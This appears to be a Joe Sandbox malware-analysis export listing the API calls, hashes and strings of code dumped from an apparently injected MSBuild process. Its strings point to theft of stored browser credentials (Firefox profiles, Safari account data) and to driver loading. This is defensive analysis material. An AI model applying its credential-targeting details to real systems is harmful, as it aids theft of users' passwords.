                                                                                                                                            • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004095FC
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3655998216-0
                                                                                                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 00445426
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1828521557-0
                                                                                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                              • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                            • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@FilePointermemcpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 609303285-0
                                                                                                                                            • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                            • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                            • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                            • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2136311172-0
                                                                                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
APIs
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
• ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
• Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
• Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
• Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
• Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
• Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
• Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
• Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
• Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
• Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
• Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
• Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
• Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
• Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

APIs
• GetLastError.KERNEL32 ref: 004182D7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
• LocalFree.KERNEL32(?), ref: 00418342
• free.MSVCRT ref: 00418370
  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76E1DF80,?,0041755F,?), ref: 00417452
  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
• String ID: OsError 0x%x (%u)
• API String ID: 2360000266-2664311388
• Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
• Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
• Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
• Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9

APIs
• GetVersionExW.KERNEL32(?), ref: 004173BE
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
• Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
• Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
• Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A

APIs
• _wcsicmp.MSVCRT ref: 004022A6
• _wcsicmp.MSVCRT ref: 004022D7
• _wcsicmp.MSVCRT ref: 00402305
• _wcsicmp.MSVCRT ref: 00402333
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT(?,?,00000011), ref: 0040269B
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
• memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 577499730-1134094380
• Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
• Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
• Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
• Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767

APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
• Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
• Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
• Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
• Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16

APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
• {Unknown}, xrefs: 004132A6
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
                                                                                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                            • API String ID: 4111938811-1819279800
APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000,?,?), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
• SetWindowTextW.USER32(?,00000000), ref: 004013CA
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
• SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID:
• API String ID: 829165378-0
APIs
• memset.MSVCRT ref: 00404172
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
• wcscpy.MSVCRT ref: 004041D6
• wcscpy.MSVCRT ref: 004041E7
• memset.MSVCRT ref: 00404200
• memset.MSVCRT ref: 00404215
• _snwprintf.MSVCRT ref: 0040422F
• wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 0040426E
• memset.MSVCRT ref: 004042CD
• memset.MSVCRT ref: 004042E2
• _snwprintf.MSVCRT ref: 004042FE
• wcscpy.MSVCRT ref: 00404311
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
• String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
• API String ID: 2454223109-1580313836
APIs
  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
• SetMenu.USER32(?,00000000), ref: 00411453
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
• GetModuleHandleW.KERNEL32(00000000), ref: 00411495
• LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
• GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
• CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
• memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
• ShowWindow.USER32(?,?), ref: 004115FE
• GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
• GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
• RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
• SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
• SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
• String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
• API String ID: 4054529287-3175352466
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
• GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
• GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
• GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
• GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
• API String ID: 667068680-2887671607
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
APIs
  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
• GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
• LoadIconW.USER32(00000000,00000072), ref: 004035CA
• GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
• LoadIconW.USER32(00000000,00000074), ref: 004035E4
• GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
• LoadIconW.USER32(00000000,00000073), ref: 004035F8
• GetModuleHandleW.KERNEL32(00000000), ref: 00403607
• LoadIconW.USER32(00000000,00000075), ref: 0040360C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
• LoadIconW.USER32(00000000,0000006F), ref: 00403620
• GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
• LoadIconW.USER32(00000000,00000076), ref: 00403634
• GetModuleHandleW.KERNEL32(00000000), ref: 00403643
• LoadIconW.USER32(00000000,00000077), ref: 00403648
• GetModuleHandleW.KERNEL32(00000000), ref: 00403657
• LoadIconW.USER32(00000000,00000070), ref: 0040365C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
• LoadIconW.USER32(00000000,00000078), ref: 00403670
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1043902810-0
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
• ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• memset.MSVCRT ref: 004085CF
• memset.MSVCRT ref: 004085F1
• memset.MSVCRT ref: 00408606
• strcmp.MSVCRT ref: 00408645
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
